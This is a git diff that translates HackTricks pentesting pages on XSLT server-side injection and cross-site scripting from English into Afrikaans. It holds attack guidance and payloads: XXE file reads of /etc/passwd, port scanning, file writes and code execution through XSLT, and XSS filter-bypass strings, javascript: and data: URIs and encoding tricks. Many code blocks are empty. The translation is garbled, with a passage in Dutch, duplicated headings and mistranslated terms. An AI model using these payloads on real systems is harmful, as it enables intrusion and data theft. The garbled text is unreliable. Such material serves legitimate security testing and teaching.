+Om 'n webtoepassing teen SSRF-aanvalle te beskerm, is dit belangrik om gebruikersinsette behoorlik te verifieer en te valideer voordat dit gebruik word om 'n aanvraag na 'n URL te stuur. Dit sluit in die beperking van toegang tot interne hulpbronne en die gebruik van 'n witlysbenadering vir toegelate URL's.
 ```xml
 
 
 ```
+## Javascript Injeksie
 
-## Javascript Injection
+Javascript-injeksie is 'n tegniek wat gebruik word deur hackers om kwaadwillige Javascript-kode in 'n webwerf in te spuit. Hierdie kode word dan uitgevoer wanneer 'n gebruiker die geïnfekteerde webwerf besoek. Die doel van hierdie aanval is gewoonlik om sensitiewe inligting te steel, gebruikers te mislei of skadelike aksies op die webwerf uit te voer.
 
+Daar is verskillende metodes vir Javascript-injeksie, insluitend:
+
+- **Cross-site Scripting (XSS)**: Hierdie aanval maak gebruik van swakheid in die webwerf se invoervalidasie om kwaadwillige skrips in te spuit wat dan deur die webwerf aan ander gebruikers gestuur word.
+- **DOM-manipulasie**: Hierdie aanval maak gebruik van die Document Object Model (DOM) van 'n webwerf om die inhoud van die webwerf te verander of skadelike aksies uit te voer.
+- **Event Handlers**: Hierdie aanval maak gebruik van skadelike skrips wat aan gebeurtenishandelaars gekoppel is, soos 'n knoppie klik of 'n vorm indiening, om skadelike aksies uit te voer.
+- **Javascript URI**: Hierdie aanval maak gebruik van 'n spesiale URI-skema om kwaadwillige Javascript-kode uit te voer wanneer 'n gebruiker daarop klik.
+
+Om jou webwerf teen Javascript-injeksie te beskerm, moet jy behoorlike invoervalidasie implementeer, gebruikersinsette korrek skoonmaak en veilige programmeerpraktyke volg. Dit sluit in die gebruik van veilige biblioteke en raamwerke, die beperking van die gebruik van eval() en die korrekte hantering van gebruikersinsette.
 ```xml
 
 
@@ -230,11 +244,9 @@ Upload this and take information
 
 
 ```
-
-## Directory listing (PHP)
+## Gidslys (PHP)
 
 ### **Opendir + readdir**
-
 ```xml
 
 
@@ -251,23 +263,21 @@ Upload this and take information
  -
 
 ```
-
 ### **Assert (var\_dump + scandir + false)**
 
+### **Beweer (var\_dump + scandir + vals)**
 ```xml
 
 
-    
-        
-        

-    
+
+
+

+
 
 ```
+## Lees lêers
 
-## Read files
-
-### **Internal - PHP**
-
+### **Intern - PHP**
 ```xml
 
 
@@ -275,9 +285,9 @@ Upload this and take information
 
 
 ```
+### **Intern - XXE**
 
-### **Internal - XXE**
-
+XXE (Eksterne Entiteitsinjeksie) is 'n aanvalstegniek wat gebruik word om 'n aanvaller toe te laat om eksterne entiteite in 'n XML-dokument in te sluit. Hierdie aanval kan gebruik word om gevoelige inligting te verkry, die bediener te vertraag of selfs om 'n DoS-aanval (Denial of Service) uit te voer.
 ```xml
 
 ]>
@@ -287,9 +297,22 @@ Upload this and take information
 
 
 ```
+### **Deur middel van HTTP**
 
-### **Through HTTP**
+XSLT Server Side Injection (SSI) is 'n aanvalstegniek wat gebruik maak van die Extensible Stylesheet Language Transformations (XSLT) om kwaadwillige kode uit te voer op 'n webbediener. Hierdie aanvalstegniek maak gebruik van 'n kwesbaarheid in die verwerking van XSLT-stylesheets deur die webbediener.
 
+Om 'n XSLT SSI-aanval uit te voer, moet jy 'n spesiaal ontwerpte XSLT-stylesheet skep wat kwaadwillige kode bevat. Hierdie stylesheet moet dan aan die webbediener gestuur word deur middel van 'n HTTP-aanvraag. Die webbediener sal die stylesheet verwerk en die kwaadwillige kode uitvoer, wat jou toelaat om die webbediener te manipuleer en toegang te verkry tot sensitiewe inligting of verdere aanvalle uit te voer.
+
+Dit is belangrik om te verstaan dat XSLT SSI-aanvalle slegs suksesvol sal wees as die webbediener XSLT-stylesheets verwerk en uitvoer. Nie alle webbedieners ondersteun hierdie funksionaliteit nie, dus moet jy eers vasstel of die teikensisteem vatbaar is vir hierdie tipe aanval.
+
+Om 'n XSLT SSI-aanval uit te voer, kan jy die volgende stappe volg:
+
+1. Identifiseer die teikensisteem se ondersteuning vir XSLT-verwerking deur die HTTP-responskoppe te ondersoek. Kyk vir die "Content-Type" -kop wat aandui of die webbediener XSLT-stylesheets verwerk.
+2. Skep 'n kwaadwillige XSLT-stylesheet wat die gewenste aksies uitvoer, soos die oproep van 'n eksterne bron of die lees van lêers op die bediener.
+3. Stuur die kwaadwillige XSLT-stylesheet na die teikensisteem deur middel van 'n HTTP-aanvraag. Maak seker dat die aanvraag die korrekte MIME-tipe vir XSLT-stylesheets bevat.
+4. Monitor die webbediener se respons om te sien of die kwaadwillige kode uitgevoer word. As dit gebeur, het jy suksesvol 'n XSLT SSI-aanval uitgevoer.
+
+Dit is belangrik om hierdie aanvalstegniek verantwoordelik te gebruik en slegs op stelsels toe te pas waarvoor jy toestemming het om te toets. Misbruik van hierdie tegniek kan lei tot ernstige regskonsekwensies.
 ```xml
 
 
@@ -306,9 +329,7 @@ Upload this and take information
 &passwd;
 
 ```
-
-### **Internal (PHP-function)**
-
+### **Intern (PHP-funksie)**
 ```xml
 
 
@@ -321,15 +342,15 @@ Upload this and take information
 ```xml
 
 
-    
-        
-        

-    
+
+
+

+
 
 ```
+### Poortskandering
 
-### Port scan
-
+'n Poortskandering is 'n tegniek wat gebruik word om die veiligheid van 'n netwerk te ondersoek deur die poorte van 'n stelsel te ondersoek vir oop of geslote statusse. Dit behels die stuur van verskeie verbindingsversoeke na die poorte van 'n stelsel om te bepaal watter poorte aktief is en watter dienste daarop beskikbaar is. Hierdie inligting kan gebruik word om potensiële swakpunte in die netwerk te identifiseer en te verhelp. 'n Poortskandering kan uitgevoer word met behulp van verskeie sagtewarehulpmiddels, soos Nmap, om die poorte van 'n stelsel te skandeer en die resultate te analiseer.
 ```xml
 
 
@@ -338,11 +359,9 @@ Upload this and take information
 
 
 ```
-
-## Write to a file
+## Skryf na 'n lêer
 
 ### XSLT 2.0
-
 ```xml
 
 
@@ -353,9 +372,37 @@ Upload this and take information
 
 
 ```
+### **Xalan-J-uitbreiding**
 
-### **Xalan-J extension**
+Die Xalan-J-uitbreiding is 'n kragtige instrument wat gebruik kan word vir XSLT-serverkant-injeksie. Hierdie tegniek maak gebruik van die Xalan-J-biblioteek, wat 'n implementering van die Extensible Stylesheet Language Transformations (XSLT) is, om kwaadwillige kode uit te voer op die bedoelde bediener.
 
+#### **Hoe werk dit?**
+
+Die Xalan-J-uitbreiding maak gebruik van die XSLT-verwerker om 'n aangepaste XSLT-stylvel te skep wat kwaadwillige instruksies bevat. Hierdie stylvel word dan aan die bediener gestuur vir verwerking. Die bediener, wat die Xalan-J-biblioteek gebruik, sal die stylvel interpreteer en die kwaadwillige instruksies uitvoer.
+
+#### **Voorbeelde van Xalan-J-uitbreiding**
+
+Hier is 'n paar voorbeelde van hoe die Xalan-J-uitbreiding gebruik kan word vir aanvalle:
+
+1. **Databasisinjeksie**: Die Xalan-J-uitbreiding kan gebruik word om kwaadwillige SQL-instruksies in te sluit in die aangepaste XSLT-stylvel. Hierdie instruksies kan dan uitgevoer word op die databasis wat deur die bediener gebruik word.
+
+2. **Lêerweergawe**: Die Xalan-J-uitbreiding kan gebruik word om lêers van die bediener te lees en hulle inhoud terug te stuur na die aanvaller. Dit kan gevoelige inligting soos wagwoorde, konfigurasie-lêers en ander belangrike data blootstel.
+
+3. **Uitvoering van stelseloproepe**: Die Xalan-J-uitbreiding kan gebruik word om stelseloproepe op die bediener uit te voer. Dit kan die aanvaller toelaat om beheer oor die bediener te verkry en verskeie kwaadwillige aksies uit te voer.
+
+#### **Beskerming teen Xalan-J-uitbreiding**
+
+Om te beskerm teen Xalan-J-uitbreiding, kan die volgende maatreëls geneem word:
+
+1. **Bepaalde toegang**: Beperk die toegang tot die Xalan-J-biblioteek en beperk die vermoë van die bediener om aangepaste XSLT-stylvelle te verwerk.
+
+2. **Invoervalidasie**: Voer streng invoervalidasie uit om te verseker dat slegs geldige en veilige invoer aanvaar word.
+
+3. **Sekuriteitspatches**: Verseker dat die bediener opgedateer is met die nuutste sekuriteitspatches om bekende kwesbaarhede te vermy.
+
+4. **Sekuriteitsbewustheid**: Verskaf opleiding aan ontwikkelaars en beheerders oor die risiko's van Xalan-J-uitbreiding en hoe om dit te voorkom.
+
+Deur hierdie maatreëls te implementeer, kan die risiko van Xalan-J-uitbreiding verminder word en die veiligheid van die bediener verhoog word.
 ```xml
 
 
@@ -363,11 +410,9 @@ Upload this and take information
 
 
 ```
+Ander maniere om lêers in die PDF te skryf
 
-Other ways to write files in the PDF
-
-## Include external XSL
-
+## Sluit eksterne XSL in
 ```xml
 
 ```
@@ -376,11 +421,9 @@ Other ways to write files in the PDF
 
 
 ```
-
-## Execute code
+## Voer kode uit
 
 ### **php:function**
-
 ```xml
 
 
 
 
 ```
+Voer kode uit deur ander raamwerke in die PDF te gebruik
 
-Execute code using other frameworks in the PDF
+### **Meer tale**
 
-### **More Languages**
+**Op hierdie bladsy kan jy voorbeelde van RCE in ander tale vind:** [**https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt\_injection#C%23%2FVB.NET%2FASP.NET**](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt\_injection#C%23%2FVB.NET%2FASP.NET) **(C#, Java, PHP)**
 
-**In this page you can find examples of RCE in other languajes:** [**https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt\_injection#C%23%2FVB.NET%2FASP.NET**](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt\_injection#C%23%2FVB.NET%2FASP.NET) **(C#, Java, PHP)**
-
-## **Access PHP static functions from classes**
-
-The following function will call the static method `stringToUrl` of the class XSL:
+## **Kry toegang tot PHP statiese funksies vanaf klasse**
 
+Die volgende funksie sal die statiese metode `stringToUrl` van die klas XSL aanroep:
 ```xml
 
 
 
 
 ```
+(Voorbeeld van [http://laurent.bientz.com/Blog/Entry/Item/using\_php\_functions\_in\_xsl-7.sls](http://laurent.bientz.com/Blog/Entry/Item/using\_php\_functions\_in\_xsl-7.sls))
 
-(Example from [http://laurent.bientz.com/Blog/Entry/Item/using\_php\_functions\_in\_xsl-7.sls](http://laurent.bientz.com/Blog/Entry/Item/using\_php\_functions\_in\_xsl-7.sls))
+## Meer Payloads
+* Kontroleer [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection)
+* Kontroleer [https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
 
-## More Payloads
-* Check [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection)
-* Check [https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
-
-## **Brute-Force Detection List**
+## **Lys vir Brute-Force Deteksie**
 
 {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xslt.txt" %}
 
-## **References**
+## **Verwysings**
 
 * [XSLT\_SSRF](https://feelsec.info/wp-content/uploads/2018/11/XSLT\_SSRF.pdf)\\
 * [http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf)\\
@@ -445,12 +485,12 @@ version="1.0">
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 

diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md
index 5816b6692..45301cc99 100644
--- a/pentesting-web/xss-cross-site-scripting/README.md
+++ b/pentesting-web/xss-cross-site-scripting/README.md
@@ -1,113 +1,110 @@
-# XSS (Cross Site Scripting)
+# XSS (Kruiswebkletsing)
 
 /
 
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
+**Bugbounty wenk**: **Teken aan** vir **Intigriti**, 'n premium **bugbounty-platform wat deur hackers, vir hackers** geskep is! Sluit vandag nog by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin om belonings tot **$100,000** te verdien!
 
 {% embed url="https://go.intigriti.com/hacktricks" %}
 
-## Methodology
+## Metodologie
 
-1. Check if **any value you control** (_parameters_, _path_, _headers_?, _cookies_?) is being **reflected** in the HTML or **used** by **JS** code.
-2. **Find the context** where it's reflected/used.
-3. If **reflected**
-   1. Check **which symbols can you use** and depending on that, prepare the payload:
-      1. In **raw HTML**:
-         1. Can you create new HTML tags?
-         2. Can you use events or attributes supporting `javascript:` protocol?
-         3. Can you bypass protections?
-         4. Is the HTML content being interpreted by any client side JS engine (_AngularJS_, _VueJS_, _Mavo_...), you could abuse a [**Client Side Template Injection**](../client-side-template-injection-csti.md).
-         5. If you cannot create HTML tags that execute JS code, could you abuse a [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection/)?
-      2. Inside a **HTML tag**:
-         1. Can you exit to raw HTML context?
-         2. Can you create new events/attributes to execute JS code?
-         3. Does the attribute where you are trapped support JS execution?
-         4. Can you bypass protections?
-      3. Inside **JavaScript code**:
-         1. Can you escape the ``** tags of a HTML page, inside a `.js` file or inside an attribute using **`javascript:`** protocol:
-
-* If reflected between **``** tags, even if your input if inside any kind of quotes, you can try to inject `` and escape from this context. This works because the **browser will first parse the HTML tags** and then the content, therefore, it won't notice that your injected `` tag is inside the HTML code.
-* If reflected **inside a JS string** and the last trick isn't working you would need to **exit** the string, **execute** your code and **reconstruct** the JS code (if there is any error, it won't be executed:
-  * `'-alert(1)-'`
-  * `';-alert(1)//`
-  * `\';alert(1)//`
-* If reflected inside template literals you can **embed JS expressions** using `${ ... }` syntax: `` var greetings = `Hello, ${alert(1)}` ``
-* **Unicode encode** works to write **valid javascript code**:
+In hierdie geval word jou inset weerspieël tussen **``**-etikette van 'n HTML-bladsy, binne 'n `.js`-lêer of binne 'n eienskap wat die **`javascript:`-protokol** gebruik:
 
+* As dit weerspieël word tussen **``**-etikette, selfs al is jou inset binne enige soort aanhalingstekens, kan jy probeer om `` in te spuit en uit hierdie konteks te ontsnap. Dit werk omdat die **blaaier eers die HTML-etikette sal ontled** en dan die inhoud, daarom sal dit nie besef dat jou ingespotte ``-etiket binne die HTML-kode is nie.
+* As dit **binne 'n JS-string** weerspieël word en die vorige truuk nie werk nie, sal jy die string moet **verlaat**, jou kode **uitvoer** en die JS-kode **herkonstrueer** (as daar enige foute is, sal dit nie uitgevoer word nie):
+* `'-alert(1)-'`
+* `';-alert(1)//`
+* `\';alert(1)//`
+* As dit binne sjabloontekens weerspieël word, kan jy **JS-uitdrukkings inbed** deur die `${ ... }`-sintaksis te gebruik: `` var greetings = `Hello, ${alert(1)}` ``
+* **Unicode-kodering** werk om **geldige javascript-kode** te skryf:
 ```javascript
 \u{61}lert(1)
 \u0061lert(1)
 \u{0061}lert(1)
 ```
-
 #### Javascript Hoisting
 
-Javascript Hoisting references the opportunity to **declare functions, variables or classes after they are used so you can abuse scenarios where a XSS is using undeclared variables or functions.**\
-**Check the following page for more info:**
+Javascript Hoisting verwys na die geleentheid om funksies, veranderlikes of klasse te verklaar nadat hulle gebruik is, sodat jy situasies kan misbruik waar 'n XSS onverklaarde veranderlikes of funksies gebruik.\
+**Kyk na die volgende bladsy vir meer inligting:**
 
 {% content-ref url="js-hoisting.md" %}
 [js-hoisting.md](js-hoisting.md)
 {% endcontent-ref %}
 
-### Javascript Function
+### Javascript Funksie
 
-Several web pages have endpoints that **accept as parameter the name of the function to execute**. A common example to see in the wild is something like: `?callback=callbackFunc`.
+Verskeie webbladsye het eindpunte wat **die naam van die funksie aanvaar as parameter om uit te voer**. 'n Algemene voorbeeld wat jy in die wild kan sien, is iets soos: `?callback=callbackFunc`.
 
-A good way to find out if something given directly by the user is trying to be executed is **modifying the param value** (for example to 'Vulnerable') and looking in the console for errors like:
+'n Goeie manier om uit te vind of iets wat direk deur die gebruiker gegee word, probeer uitgevoer word, is deur die param-waarde te **verander** (byvoorbeeld na 'Vulnerable') en in die konsole te kyk vir foute soos:
 
 ![](<../../.gitbook/assets/image (651) (2).png>)
 
-In case it's vulnerable, you could be able to **trigger an alert** just doing sending the value: **`?callback=alert(1)`**. However, it' very common that this endpoints will **validate the content** to only allow letters, numbers, dots and underscores (**`[\w\._]`**).
+In die geval dat dit kwesbaar is, kan jy in staat wees om 'n waarskuwing te **trigger** deur net die waarde te stuur: **`?callback=alert(1)`**. Dit is egter baie algemeen dat hierdie eindpunte die inhoud sal **valideer** om slegs letters, syfers, punte en onderstreepstrepe toe te laat (**`[\w\._]`**).
 
-However, even with that limitation it's still possible to perform some actions. This is because you can use that valid chars to **access any element in the DOM**:
+Nogtans is dit steeds moontlik om sekere aksies uit te voer, selfs met daardie beperking. Dit is omdat jy daardie geldige karakters kan gebruik om enige element in die DOM te **toegang**:
 
 ![](<../../.gitbook/assets/image (662).png>)
 
-Some useful functions for this:
-
+Sommige nuttige funksies hiervoor:
 ```
 firstElementChild
 lastElementChild
@@ -115,12 +112,11 @@ nextElementSibiling
 lastElementSibiling
 parentElement
 ```
+Jy kan ook probeer om **Javascript funksies te aktiveer** direk: `obj.sales.delOrders`.
 
-You can also try to **trigger Javascript functions** directly: `obj.sales.delOrders`.
+Gewoonlik is die eindpunte wat die aangeduide funksie uitvoer eindpunte sonder veel interessante DOM, **ander bladsye in dieselfde oorsprong** sal 'n **meer interessante DOM** hê om meer aksies uit te voer.
 
-However, usually the endpoints executing the indicated function are endpoints without much interesting DOM, **other pages in the same origin** will have a **more interesting DOM** to perform more actions.
-
-Therefore, in order to **abuse this vulnerability in a different DOM** the **Same Origin Method Execution (SOME)** exploitation was developed:
+Daarom is die **Same Origin Method Execution (SOME)** uitbuiting ontwikkel om hierdie kwesbaarheid in 'n ander DOM te **misbruik**:
 
 {% content-ref url="some-same-origin-method-execution.md" %}
 [some-same-origin-method-execution.md](some-same-origin-method-execution.md)
@@ -128,16 +124,16 @@ Therefore, in order to **abuse this vulnerability in a different DOM** the **Sam
 
 ### DOM
 
-There is **JS code** that is using **unsafely** some **data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.
+Daar is **JS-kode** wat **onveilig** gebruik maak van **data wat deur 'n aanvaller beheer word**, soos `location.href`. 'n Aanvaller kan dit misbruik om willekeurige JS-kode uit te voer.
 
 {% content-ref url="dom-xss.md" %}
 [dom-xss.md](dom-xss.md)
 {% endcontent-ref %}
 
-### **Universal XSS**
+### **Universele XSS**
 
-These kind of XSS can be found **anywhere**. They not depend just on the client exploitation of a web application but on **any** **context**. These kind of **arbitrary JavaScript execution** can even be abuse to obtain **RCE**, **read** **arbitrary** **files** in clients and servers, and more.\
-Some **examples**:
+Hierdie soort XSS kan **oral** gevind word. Dit hang nie net af van die kliënt-uitbuiting van 'n webtoepassing nie, maar van **enige** **konteks**. Hierdie soort **willekeurige JavaScript-uitvoering** kan selfs misbruik word om **RCE** te verkry, **willekeurige** **lêers** in kliënte en bedieners te **lees**, en nog meer.\
+Sommige **voorbeelde**:
 
 {% content-ref url="server-side-xss-dynamic-pdf.md" %}
 [server-side-xss-dynamic-pdf.md](server-side-xss-dynamic-pdf.md)
@@ -147,43 +143,38 @@ Some **examples**:
 [electron-desktop-apps](../../network-services-pentesting/pentesting-web/electron-desktop-apps/)
 {% endcontent-ref %}
 
-## WAF bypass encoding image
+## WAF omseilingskodering van beeld
 
-![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/eaubb2ex0aerank.jpg)
+![vanaf https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/eaubb2ex0aerank.jpg)
 
-## Injecting inside raw HTML
+## Injekteer binne rou HTML
 
-When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\
-For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\
-_**Note: A HTML comment can be closed using `-->` or `--!>`**_
-
-In this case and if no black/whitelisting is used, you could use payloads like:
+Wanneer jou inset **binne die HTML-bladsy** weerspieël word of jy HTML-kode kan ontsnap en injekteer in hierdie konteks, is die **eerste** ding wat jy moet doen, om te kyk of jy die `<` kan misbruik om nuwe etikette te skep: Probeer net om daardie **karakter** te **weerspieël** en kyk of dit **HTML-gekodeer** of **verwyder** word, of as dit **weerspieël word sonder veranderinge**. **Slegs in die laaste geval sal jy hierdie geval kan uitbuit**.\
+Vir hierdie gevalle moet jy ook **onthou** van [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\
+_**Nota: 'n HTML-kommentaar kan gesluit word met `-->` of `--!>`**_
 
+In hierdie geval, as geen swart-/witlys gebruik word nie, kan jy payloads gebruik soos:
 ```html
 
 
 
 ```
+Maar, as tags/atribute swart/lys gebruik word, sal jy nodig hê om te **brute-force watter tags** jy kan skep.\
+Sodra jy **gevind het watter tags toegelaat word**, sal jy nodig hê om **brute-force atribute/gebeure** binne die gevonde geldige tags te doen om te sien hoe jy die konteks kan aanval.
 
-But, if tags/attributes black/whitelisting is being used, you will need to **brute-force which tags** you can create.\
-Once you have **located which tags are allowed**, you would need to **brute-force attributes/events** inside the found valid tags to see how you can attack the context.
+### Tags/Gebeure brute-force
 
-### Tags/Events brute-force
+Gaan na [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) en klik op _**Kopieer tags na knipbord**_. Stuur dan almal deur gebruik te maak van Burp intruder en kyk of enige tags nie as skadelik deur die WAF ontdek is nie. Sodra jy uitgevind het watter tags jy kan gebruik, kan jy **brute force al die gebeure** gebruik deur die geldige tags (op dieselfde webbladsy klik op _**Kopieer gebeure na knipbord**_ en volg dieselfde prosedure as voorheen).
 
-Go to [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) and click on _**Copy tags to clipboard**_. Then, send all of them using Burp intruder and check if any tags wasn't discovered as malicious by the WAF. Once you have discovered which tags you can use, you can **brute force all the events** using the valid tags (in the same web page click on _**Copy events to clipboard**_ and follow the same procedure as before).
-
-### Custom tags
-
-If you didn't find any valid HTML tag, you could try to **create a custom tag** and and execute JS code with the `onfocus` attribute. In the XSS request, you need to end the URL with `#` to make the page **focus on that object** and **execute** the code:
+### Aangepaste tags
 
+As jy nie enige geldige HTML-tag gevind het nie, kan jy probeer om **'n aangepaste tag te skep** en JS-kode uit te voer met die `onfocus` atribuut. In die XSS-versoek, moet jy die URL beëindig met `#` om die bladsy **te fokus op daardie voorwerp** en die kode **uit te voer**:
 ```
 /?search=#x
 ```
+### Swartlys Verbygaan
 
-### Blacklist Bypasses
-
-If some kind of blacklist is being used you could try to bypass it with some silly tricks:
-
+As 'n soort swartlys gebruik word, kan jy probeer om dit te verbygaan met 'n paar dom truuks:
 ```javascript
 //Random capitalization
 

+```
+
+Om stylgebeure te voorkom, moet webontwikkelaars insette van gebruikers behoorlik valideer en ontsmet. Dit kan gedoen word deur die gebruik van 'n HTML-sanitiseringsbiblioteek of deur die implementering van 'n beperkte witlys van toelaatbare CSS-eienskappe en waardes.
 ```python
 
XSS

 
XSS

@@ -282,18 +279,16 @@ If you **cannot escape from the tag**, you could create new attributes inside th
 #moving your mouse anywhere over the page (0-click-ish):
 

 ```
+### Binne die eienskap
 
-### Within the attribute
+Selfs as jy **nie kan ontsnap uit die eienskap nie** (`"` word gekodeer of verwyder), afhangende van **watter eienskap** jou waarde weerspieël as jy al die waarde beheer of net 'n deel daarvan, sal jy dit kan misbruik. By **voorbeeld**, as jy 'n gebeurtenis soos `onclick=` beheer, sal jy dit kan maak om willekeurige kode uit te voer wanneer dit geklik word.\
+'n Ander interessante **voorbeeld** is die eienskap `href`, waar jy die `javascript:` protokol kan gebruik om willekeurige kode uit te voer: **`href="javascript:alert(1)"`**
 
-Even if you **cannot escape from the attribute** (`"` is being encoded or deleted), depending on **which attribute** your value is being reflected in **if you control all the value or just a part** you will be able to abuse it. For **example**, if you control an event like `onclick=` you will be able to make it execute arbitrary code when it's clicked.\
-Another interesting **example** is the attribute `href`, where you can use the `javascript:` protocol to execute arbitrary code: **`href="javascript:alert(1)"`**
+**Deurkruising binne die gebeurtenis deur HTML-kodering/URL-kodering te gebruik**
 
-**Bypass inside event using HTML encoding/URL encode**
-
-The **HTML encoded characters** inside the value of HTML tags attributes are **decoded on runtime**. Therefore something like the following will be valid (the payload is in bold): `Go Back `
-
-Note that **any kind of HTML encode is valid**:
+Die **HTML-gekodeerde karakters** binne die waarde van HTML-etiketseienskappe word **tydens uitvoering gedekodeer**. Daarom sal iets soos die volgende geldig wees (die payload is vetgedruk): `Go Back `
 
+Let daarop dat **enige soort HTML-kodering geldig is**:
 ```javascript
 //HTML entities
 '-alert(1)-'
@@ -310,25 +305,37 @@ Note that **any kind of HTML encode is valid**:
 a
 a
 ```
-
-**Note that URL encode will also work:**
-
+**Let wel dat URL-kodering ook sal werk:**
 ```python
 Click
 ```
+**Deurloop binne-gebeurtenis deur gebruik te maak van Unicode-kodering**
 
-**Bypass inside event using Unicode encode**
+Om XSS-filters te omseil wat binnen-gebeurtenissen (zoals onclick, onmouseover, enz.) controleren, kan Unicode-kodering worden gebruikt. Dit houdt in dat speciale tekens worden vervangen door hun Unicode-equivalenten.
 
+Bijvoorbeeld, het karakter `<` kan worden vervangen door `\u003c` en het karakter `>` kan worden vervangen door `\u003e`. Op deze manier kan kwaadaardige code worden ingevoegd zonder dat deze wordt gedetecteerd door de XSS-filter.
+
+Hier is een voorbeeld van hoe dit kan worden gedaan:
+
+```html
+
+```
+
+Dit kan worden omgezet naar:
+
+```html
+
+```
+
+Op deze manier kan de kwaadaardige code worden uitgevoerd wanneer de binnen-gebeurtenis wordt geactiveerd. Het is echter belangrijk op te merken dat deze techniek mogelijk niet altijd werkt, afhankelijk van de specifieke implementatie van de XSS-filter.
 ```javascript
 //For some reason you can use unicode to encode "alert" but not "(1)"
 
 
 ```
+### Spesiale Protokolle binne die eienskap
 
-### Special Protocols Within the attribute
-
-There you can use the protocols **`javascript:`** or **`data:`** in some places to **execute arbitrary JS code**. Some will require user interaction on some won't.
-
+Daar kan jy die protokolle **`javascript:`** of **`data:`** gebruik op sekere plekke om **arbitrêre JS-kode uit te voer**. Sommige sal gebruikerinteraksie vereis en ander nie.
 ```javascript
 javascript:alert(1)
 JavaSCript:alert(1)
@@ -337,7 +344,7 @@ javascript:alert(1)
 javascript:alert(1)
 javascript:alert(1)
 javascriptΪlert(1)
-java        //Note the new line 
+java        //Note the new line
 script:alert(1)
 
 data:text/html,
@@ -348,11 +355,9 @@ data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
 data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg
